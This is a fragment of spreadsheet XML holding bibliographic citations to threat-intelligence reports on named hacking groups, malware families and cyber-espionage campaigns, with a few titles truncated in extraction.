    <t>CISA. (2020, July 16). MAR-10296782-3.v1 – WELLMAIL. Retrieved September 29, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CISA. (2020, July 16). MAR-10296782-2.v1 – WELLMESS. Retrieved September 24, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Insikt Group (Recorded Future). (2017, May 17). Recorded Future Research Concludes Chinese Ministry of State Security Behind APTRetrieved June 18, 2017.</t>
  </si>
  <si>
    <t>Korban, C, et al. (2017, September). APT3 Adversary Emulation Plan. Retrieved January 16, 2018.</t>
  </si>
  <si>
    <t>Lancaster, T. (2015, July 25). A tale of Pirpi, Scanbox &amp; CVE-2015-311Retrieved March 30, 2016.</t>
  </si>
  <si>
    <t>valsmith. (2012, September 21). More on APTSim. Retrieved September 28, 2017.</t>
  </si>
  <si>
    <t>Chen, X., Scott, M., Caselden, D.. (2014, April 26). New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks. Retrieved January 14, 2016.</t>
  </si>
  <si>
    <t>Yates, M. (2017, June 18). APT3 Uncovered: The code evolution of Pirpi. Retrieved September 28, 2017.</t>
  </si>
  <si>
    <t>Glyer, C. (2018, April 14). @cglyer Status Update. Retrieved October 11, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Baumgartner, K., Golovkin, M.. (2015, May 14). The Naikon APT. Retrieved January 14, 2015.</t>
  </si>
  <si>
    <t>Foltýn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.</t>
  </si>
  <si>
    <t>Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019.</t>
  </si>
  <si>
    <t>Carr, N.. (2017, December 26). Nick Carr Status Update APT32 pubprn. Retrieved April 22, 2019.</t>
  </si>
  <si>
    <t>Bohannon, D.. (2017, March 13). Invoke-Obfuscation - PowerShell Obfuscator. Retrieved June 18, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Henderson, S., et al. (2020, April 22). Vietnamese Threat Actors APT32 Targeting Wuhan Government and Chinese Ministry of Emergency Management in Latest Example of COVID-19 Related Espionage. Retrieved April 28, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Carr, N. (2017, December 22). ItsReallyNick Status Update. Retrieved April 9, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Horejsi, J. (2018, April 04). New MacOS Backdoor Linked to OceanLotus Found. Retrieved November 13, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Raiu, C., and Ivanov, A. (2016, June 17). Operation Daybreak. Retrieved February 15, 2018.</t>
  </si>
  <si>
    <t>CrowdStrike. (2021, September 30). Adversary Profile - Richochet Chollima. Retrieved September 30, 2021.</t>
  </si>
  <si>
    <t>Cash, D., Grunzweig, J., Adair, S., Lancaster, T. (2021, August 25). North Korean BLUELIGHT Special: InkySquid Deploys RokRAT. Retrieved October 1, 2021.</t>
  </si>
  <si>
    <t>Department of Justice. (2021, February 17). Three North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyberattacks and Financial Crimes Across the Globe. Retrieved June 9, 2021.</t>
  </si>
  <si>
    <t>GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.</t>
  </si>
  <si>
    <t>SecureWorks. (2021, September 29). NICKEL GLADSTONE Threat Profile. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Meyers, Adam. (2018, April 6). Meet CrowdStrike’s Adversary of the Month for April: STARDUST CHOLLIMA. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>CrowdStrike. (2021, June 7). CrowdStrike 2021 Global Threat Report. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Dept. of Treasury. (2020, September 17). Treasury Sanctions Cyber Actors Backed by Iranian Intelligence. Retrieved December 10, 2020.</t>
  </si>
  <si>
    <t>DOJ. (2020, September 17). Department of Justice and Partner Departments and Agencies Conduct Coordinated Actions to Disrupt and Deter Iranian Malicious Cyber Activities Targeting the United States and the Broader International Community. Retrieved December 10, 2020.</t>
  </si>
  <si>
    <t>Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020.</t>
  </si>
  <si>
    <t>McMillen, D. Sperry, C. (2019, June 14). Observations of ITG07 Cyber Operations. Retrieved May 17, 2021.</t>
  </si>
  <si>
    <t>Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Legezo, D. (2019, January 30). Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities. Retrieved April 17, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Carr, N. (2019, October 30). Nick Carr Status Update APT41 Environmental Keying. Retrieved June 23, 2020.</t>
  </si>
  <si>
    <t>Esler, J., Lee, M., and Williams, C.. (2014, October 14). Threat Spotlight: Group 7Retrieved January 14, 2016.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2017, October 16). BlackOasis APT and new targeted attacks leveraging zero-day exploit. Retrieved February 15, 2018.</t>
  </si>
  <si>
    <t>Bing, C. (2017, October 16). Middle Eastern hacking group is using FinFisher malware to conduct international espionage. Retrieved February 15, 2018.</t>
  </si>
  <si>
    <t>Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020.</t>
  </si>
  <si>
    <t>Chen, J. and Hsieh, M. (2017, November 7). REDBALDKNIGHT/BRONZE BUTLER’s Daserf Backdoor Now Using Steganography. Retrieved December 27, 2017.</t>
  </si>
  <si>
    <t>Europol. (2018, March 26). Mastermind Behind EUR 1 Billion Cyber Bank Robbery Arrested in Spain. Retrieved October 10, 2018.</t>
  </si>
  <si>
    <t>CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021.</t>
  </si>
  <si>
    <t>Secureworks. (n.d.). GOLD KINGSWOOD. Retrieved October 18, 2021.</t>
  </si>
  <si>
    <t>Griffin, N. (2017, January 17). CARBANAK GROUP USES GOOGLE FOR MALWARE COMMAND-AND-CONTROL. Retrieved February 15, 2017.</t>
  </si>
  <si>
    <t>Jansen, W . (2021, January 12). Abusing cloud services to fly under the radar. Retrieved January 19, 2021.</t>
  </si>
  <si>
    <t>Dell SecureWorks. (2015, October 7). Suspected Iran-Based Hacker Group Creates Network of Fake LinkedIn Profiles. Retrieved January 14, 2016.</t>
  </si>
  <si>
    <t>Positive Technologies. (2017, August 16). Cobalt Strikes Back: An Evolving Multinational Threat to Finance. Retrieved September 5, 2018.</t>
  </si>
  <si>
    <t>Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018.</t>
  </si>
  <si>
    <t>Mesa, M, et al. (2017, June 1). Microsoft Word Intruder Integrates CVE-2017-0199, Utilized by Cobalt Group to Target Financial Institutions. Retrieved October 10, 2018.</t>
  </si>
  <si>
    <t>Klijnsma, Y.. (2017, November 28). Gaffe Reveals Full List of Targets in Spear Phishing Attack Using Cobalt Strike Against Financial Institutions. Retrieved October 10, 2018.</t>
  </si>
  <si>
    <t>Klijnsma, Y.. (2018, January 16). First Activities of Cobalt Group in 2018: Spear Phishing Russian Banks. Retrieved October 10, 2018.</t>
  </si>
  <si>
    <t>CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.</t>
  </si>
  <si>
    <t>Gorelik, M. (2018, October 08). Cobalt Group 2.0. Retrieved November 5, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Unit 4(2018, October 25). New Techniques to Uncover and Attribute Financial actors Commodity Builders and Infrastructure Revealed. Retrieved December 11, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ClearSky Cyber Security. (2017, March 30). Jerusalem Post and other Israeli websites compromised by Iranian threat agent CopyKitten. Retrieved August 21, 2017.</t>
  </si>
  <si>
    <t>ClearSky and Trend Micro. (2017, July). Operation Wilted Tulip - Exposing a cyber espionage apparatus. Retrieved May 17, 2021.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research and Analysis Team. (2014, November). The Darkhotel APT A Story of Unusual Hospitality. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2015, August 10). Darkhotel's attacks in 201Retrieved November 2, 2018.</t>
  </si>
  <si>
    <t>Microsoft . (2020, September 29). Microsoft Digital Defense Report FY20. Retrieved April 21, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2016, June 9). Reverse-engineering DUBNIUM. Retrieved March 31, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2016, June 20). Reverse-engineering DUBNIUM’s Flash-targeting exploit. Retrieved March 31, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2016, July 14). Reverse engineering DUBNIUM – Stage 2 payload analysis . Retrieved March 31, 2021.</t>
  </si>
  <si>
    <t>Arunpreet Singh, Clemens Kolbitsch. (2015, November 5). Defeating Darkhotel Just-In-Time Decryption. Retrieved April 15, 2021.</t>
  </si>
  <si>
    <t>Falcone, R. (2018, August 07). DarkHydrus Uses Phishery to Harvest Credentials in the Middle East. Retrieved August 10, 2018.</t>
  </si>
  <si>
    <t>RSA Incident Response. (2014, January). RSA Incident Response Emerging Threat Profile: Shell Crew. Retrieved January 14, 2016.</t>
  </si>
  <si>
    <t>Scott, J. and Spaniel, D. (2016, July 28). ICIT Brief - China’s Espionage Dynasty: Economic Death by a Thousand Cuts. Retrieved June 7, 2018.</t>
  </si>
  <si>
    <t>RYANJ. (2014, February 20). Mo’ Shells Mo’ Problems – Deep Panda Web Shells. Retrieved September 16, 2015.</t>
  </si>
  <si>
    <t>Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020.</t>
  </si>
  <si>
    <t>Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018.</t>
  </si>
  <si>
    <t>Secureworks. (n.d.). IRON LIBERTY. Retrieved October 15, 2020.</t>
  </si>
  <si>
    <t>Kali. (2014, February 18). THC-Hydra. Retrieved November 2, 2017.</t>
  </si>
  <si>
    <t>Paganini, P. (2012, September 9). Elderwood project, who is behind Op. Aurora and ongoing attacks?. Retrieved February 13, 2018.</t>
  </si>
  <si>
    <t>Clayton, M.. (2012, September 14). Stealing US business secrets: Experts ID two huge cyber 'gangs' in China. Retrieved February 15, 2018.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research and Analysis Team. (2015, February). Equation Group: Questions and Answers. Retrieved December 21, 2015.</t>
  </si>
  <si>
    <t>Kaspersky Lab. (2012, August). Gauss: Abnormal Distribution. Retrieved January 17, 2019.</t>
  </si>
  <si>
    <t>Adamitis, D. (2020, May 6). Phantom in the Command Shell. Retrieved January 28, 2021.</t>
  </si>
  <si>
    <t>FireEye iSIGHT Intelligence. (2017, June 16). FIN10: Anatomy of a Cyber Extortion Operation. Retrieved June 25, 2017.</t>
  </si>
  <si>
    <t>Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016</t>
  </si>
  <si>
    <t>Vengerik, B. et al.. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved December 17, 2018.</t>
  </si>
  <si>
    <t>Dennesen, K. et al.. (2014, November 30). FIN4: Stealing Insider Information for an Advantage in Stock Trading?. Retrieved December 17, 2018.</t>
  </si>
  <si>
    <t>Vengerik, B. &amp; Dennesen, K.. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved January 15, 2019.</t>
  </si>
  <si>
    <t>Scavella, T. and Rifki, A. (2017, July 20). Are you Ready to Respond? (Webinar). Retrieved October 4, 2017.</t>
  </si>
  <si>
    <t>Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020.</t>
  </si>
  <si>
    <t>Chen, J. (2019, October 10). Magecart Card Skimmers Injected Into Online Shops. Retrieved September 9, 2020.</t>
  </si>
  <si>
    <t>Klijnsma, Y. (2018, September 11). Inside the Magecart Breach of British Airways: How 22 Lines of Code Claimed 380,000 Victims. Retrieved September 9, 2020.</t>
  </si>
  <si>
    <t>Klijnsma, Y. (2018, September 19). Another Victim of the Magecart Assault Emerges: Newegg. Retrieved September 9, 2020.</t>
  </si>
  <si>
    <t>Kremez, V. (2019, September 19). FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis &amp; Internals. Retrieved September 8, 2020.</t>
  </si>
  <si>
    <t>Priego, A. (2021, July). THE BROTHERS GRIM: THE REVERSING TALE OF GRIMAGENT MALWARE USED BY RYUK. Retrieved July 16, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Gorelik, M.. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. Retrieved July 13, 2017.</t>
  </si>
  <si>
    <t>Federal Bureau of Investigation, Cyber Division. (2020, March 26). FIN7 Cyber Actors Targeting US Businesses Through USB Keystroke Injection Attacks. Retrieved October 14, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Erickson, J., McWhirt, M., Palombo, D. (2017, May 3). To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence. Retrieved July 18, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Waterman, S. (2017, October 16). Fin7 weaponization of DDE is just their latest slick move, say researchers. Retrieved November 21, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Bohannon, D. &amp; Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Namestnikov, Y. and Aime, F. (2019, May 8). FIN7.5: the infamous cybercrime rig “FIN7” continues its activities. Retrieved October 11, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7’s Monkey Thief . Retrieved July 27, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Bohannon, D. &amp; Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018.</t>
  </si>
  <si>
    <t>Dragos. (n.d.). PARISITE. Retrieved December 21, 2020.</t>
  </si>
  <si>
    <t>ClearSky. (2020, December 17). Pay2Key Ransomware – A New Campaign by Fox Kitten. Retrieved December 21, 2020.</t>
  </si>
  <si>
    <t>Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2018, October 10). Gallmaker: New Attack Group Eschews Malware to Live off the Land. Retrieved November 27, 2018.</t>
  </si>
  <si>
    <t>Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020.</t>
  </si>
  <si>
    <t>Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2016, February 8). APT-style bank robberies increase with Metel, GCMAN and Carbanak 2.0 attacks. Retrieved April 20, 2016.</t>
  </si>
  <si>
    <t>Secureworks. (n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020.</t>
  </si>
  <si>
    <t>Tetra Defense. (2020, March). CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS. Retrieved December 14, 2020.</t>
  </si>
  <si>
    <t>Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021.</t>
  </si>
  <si>
    <t>MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021.</t>
  </si>
  <si>
    <t>Singh, S. Singh, A. (2020, June 11). The Return on the Higaisa APT. Retrieved March 2, 2021.</t>
  </si>
  <si>
    <t>Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020.</t>
  </si>
  <si>
    <t>GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020.</t>
  </si>
  <si>
    <t>Lakshmanan, R.. (2021, July 1). IndigoZebra APT Hacking Campaign Targets the Afghan Government. Retrieved September 24, 2021.</t>
  </si>
  <si>
    <t>U.S. Department of Treasury. (2019, December 5). Treasury Sanctions Evil Corp, the Russia-Based Cybercriminal Group Behind Dridex Malware. Retrieved September 15, 2021.</t>
  </si>
  <si>
    <t>Alyac. (2019, April 3). Kimsuky Organization Steals Operation Stealth Power. Retrieved August 13, 2019.</t>
  </si>
  <si>
    <t>BRI. (2019, April). Kimsuky unveils APT campaign 'Smoke Screen' aimed at Korea and America. Retrieved October 7, 2019.</t>
  </si>
  <si>
    <t>ASERT team. (2018, December 5). STOLEN PENCIL Campaign Targets Academia. Retrieved February 5, 2019.</t>
  </si>
  <si>
    <t>AhnLab. (2019, February 28). Operation Kabar Cobra - Tenacious cyber-espionage campaign by Kimsuky Group. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Cimpanu, C.. (2018, December 5). Cyber-espionage group uses Chrome extension to infect victims. Retrieved August 26, 2019.</t>
  </si>
  <si>
    <t>ThreatConnect. (2020, September 28). Kimsuky Phishing Operations Putting In Work. Retrieved October 30, 2020.</t>
  </si>
  <si>
    <t>Cimpanu, C. (2020, September 30). North Korea has tried to hack 11 officials of the UN Security Council. Retrieved November 4, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Kim, J. et al. (2019, October). KIMSUKY GROUP: TRACKING THE KING OF THE SPEAR PHISHING. Retrieved November 2, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Tarakanov , D.. (2013, September 11). The “Kimsuky” Operation: A North Korean APT?. Retrieved August 13, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure. Retrieved July 13, 2017.</t>
  </si>
  <si>
    <t>US Treasury . (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017.</t>
  </si>
  <si>
    <t>Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Tools Report. Retrieved March 10, 2016.</t>
  </si>
  <si>
    <t>Sherstobitoff, R. (2018, February 12). Lazarus Resurfaces, Targets Global Banks and Bitcoin Users. Retrieved February 19, 2018.</t>
  </si>
  <si>
    <t>Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Loaders, Installers and Uninstallers Report. Retrieved March 2, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Remote Administration Tools &amp; Content Staging Malware Report. Retrieved March 16, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>US-CERT. (2018, March 09). Malware Analysis Report (MAR) - 10135536.11.WHITE. Retrieved June 13, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Sherstobitoff, R., Malhotra, A. (2018, April 24). Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide. Retrieved May 16, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>USG. (2020, May 12). MAR-10288834-2.v1 – North Korean Trojan: TAINTEDSCRIBE. Retrieved March 5, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved October 3, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>US-CERT. (2018, February 05). Malware Analysis Report (MAR) - 10135536-F. Retrieved June 11, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>US-CERT. (2020, February 20). MAR-10271944-1.v1 – North Korean Trojan: HOTCROISSANT. Retrieved May 1, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>US-CERT. (2018, August 09). MAR-10135536-17 – North Korean Trojan: KEYMARBLE. Retrieved August 16, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Lei, C., et al. (2018, January 24). Lazarus Campaign Targeting Cryptocurrencies Reveals Remote Controller Tool, an Evolved RATANKBA, and More. Retrieved May 22, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>US-CERT. (2018, June 14). MAR-10135536-12 – North Korean Trojan: TYPEFRAME. Retrieved July 13, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>US-CERT. (2017, November 22). Alert (TA17-318B): HIDDEN COBRA – North Korean Trojan: Volgmer. Retrieved December 7, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dragos, Inc. (2018, August 2). RASPITE. Retrieved November 26, 2018.</t>
  </si>
  <si>
    <t>Adam Kozy. (2018, August 30). Two Birds, One Stone Panda. Retrieved August 24, 2021.</t>
  </si>
  <si>
    <t>Ben Koehl, Joe Hannon. (2020, September 24). Microsoft Security - Detecting Empires in the Cloud. Retrieved August 24, 2021.</t>
  </si>
  <si>
    <t>SecureWorks. (n.d.). Threat Profile - BRONZE MOHAWK. Retrieved August 24, 2021.</t>
  </si>
  <si>
    <t>Falcone, R., et al.. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016.</t>
  </si>
  <si>
    <t>Accenture Security. (2018, January 27). DRAGONFISH DELIVERS NEW FORM OF ELISE MALWARE TARGETING ASEAN DEFENCE MINISTERS’ MEETING AND ASSOCIATES. Retrieved November 14, 2018.</t>
  </si>
  <si>
    <t>Baumgartner, K.. (2015, June 17). The Spring Dragon APT. Retrieved February 15, 2016.</t>
  </si>
  <si>
    <t>Falcone, R. and Miller-Osborn, J.. (2015, December 18). Attack on French Diplomat Linked to Operation Lotus Blossom. Retrieved February 15, 2016.</t>
  </si>
  <si>
    <t>Falcone, R. and Miller-Osborn, J. (2016, February 3). Emissary Trojan Changelog: Did Operation Lotus Blossom Cause It to Evolve?. Retrieved February 15, 2016.</t>
  </si>
  <si>
    <t>ClearSky Research Team. (2020, August 1). The Kittens Are Back in Town 3 - Charming Kitten Campaign Evolved and Deploying Spear-Phishing link by WhatsApp. Retrieved April 21, 2021.</t>
  </si>
  <si>
    <t>Certfa Labs. (2021, January 8). Charming Kitten’s Christmas Gift. Retrieved May 3, 2021.</t>
  </si>
  <si>
    <t>Secureworks. (n.d.). COBALT ILLUSION Threat Profile. Retrieved April 14, 2021.</t>
  </si>
  <si>
    <t>Miller, J. et al. (2021, July 13). Operation SpoofedScholars: A Conversation with TA45Retrieved August 18, 2021.</t>
  </si>
  <si>
    <t>Miller, J. et al. (2021, March 30). BadBlood: TA453 Targets US and Israeli Medical Research Personnel in Credential Phishing Campaigns. Retrieved May 4, 2021.</t>
  </si>
  <si>
    <t>ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.</t>
  </si>
  <si>
    <t>Kerner, S. (2014, May 29). Newscaster Threat Uses Social Media for Intelligence Gathering. Retrieved April 14, 2021.</t>
  </si>
  <si>
    <t>ClearSky Research Team. (2019, October 1). The Kittens Are Back in Town2 - Charming Kitten Campaign KeepsGoing on, Using New Impersonation Methods. Retrieved April 21, 2021.</t>
  </si>
  <si>
    <t>Wikoff, A. Emerson, R. (2020, July 16). New Research Exposes Iranian Threat Group Operations. Retrieved March 8, 2021.</t>
  </si>
  <si>
    <t>Burt, T. (2019, March 27). New steps to protect customers from hacking. Retrieved May 27, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Burt, T. (2020, October 28). Cyberattacks target international conference attendees. Retrieved March 8, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>US District Court of DC. (2019, March 14). MICROSOFT CORPORATION v. JOHN DOES 1-2, CONTROLLING A COMPUTER NETWORK AND THEREBY INJURING PLAINTIFF AND ITS CUSTOMERS. Retrieved March 8, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2017, February 15). Iranian PupyRAT Bites Middle Eastern Organizations. Retrieved December 27, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2017, July 27). The Curious Case of Mia Ash: Fake Persona Lures Middle Eastern Targets. Retrieved February 26, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>US District Court Southern District of New York. (2018, December 17). United States v. Zhu Hua Indictment. Retrieved December 17, 2020.</t>
  </si>
  <si>
    <t>Crowdstrike. (2013, October 16). CrowdCasts Monthly: You Have an Adversary Problem. Retrieved March 1, 2017.</t>
  </si>
  <si>
    <t>PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.</t>
  </si>
  <si>
    <t>Twi1ight. (2015, July 11). AD-Pentest-Script - wmiexec.vbs. Retrieved June 29, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Haq, T., Moran, N., Scott, M., &amp; Vashisht, S. O. (2014, September 10). The Path to Mass-Producing Cyber Attacks [Blog]. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.</t>
  </si>
  <si>
    <t>GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020.</t>
  </si>
  <si>
    <t>Villeneuve, N., Haq, H., Moran, N. (2013, August 23). OPERATION MOLERATS: MIDDLE EAST CYBER ATTACKS USING POISON IVY. Retrieved April 1, 2016.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.</t>
  </si>
  <si>
    <t>Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019.</t>
  </si>
  <si>
    <t>Villanueva, M., Co, M. (2018, June 14). Another Potential MuddyWater Campaign uses Powershell-based PRB-Backdoor. Retrieved July 3, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Meyers, A. (2018, June 15). Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA. Retrieved April 12, 2021.</t>
  </si>
  <si>
    <t>Anomali Threat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021.</t>
  </si>
  <si>
    <t>Proofpoint Threat Research Team. (2020, November 23). TA416 Goes to Ground and Returns with a Golang PlugX Malware Loader. Retrieved April 13, 2021.</t>
  </si>
  <si>
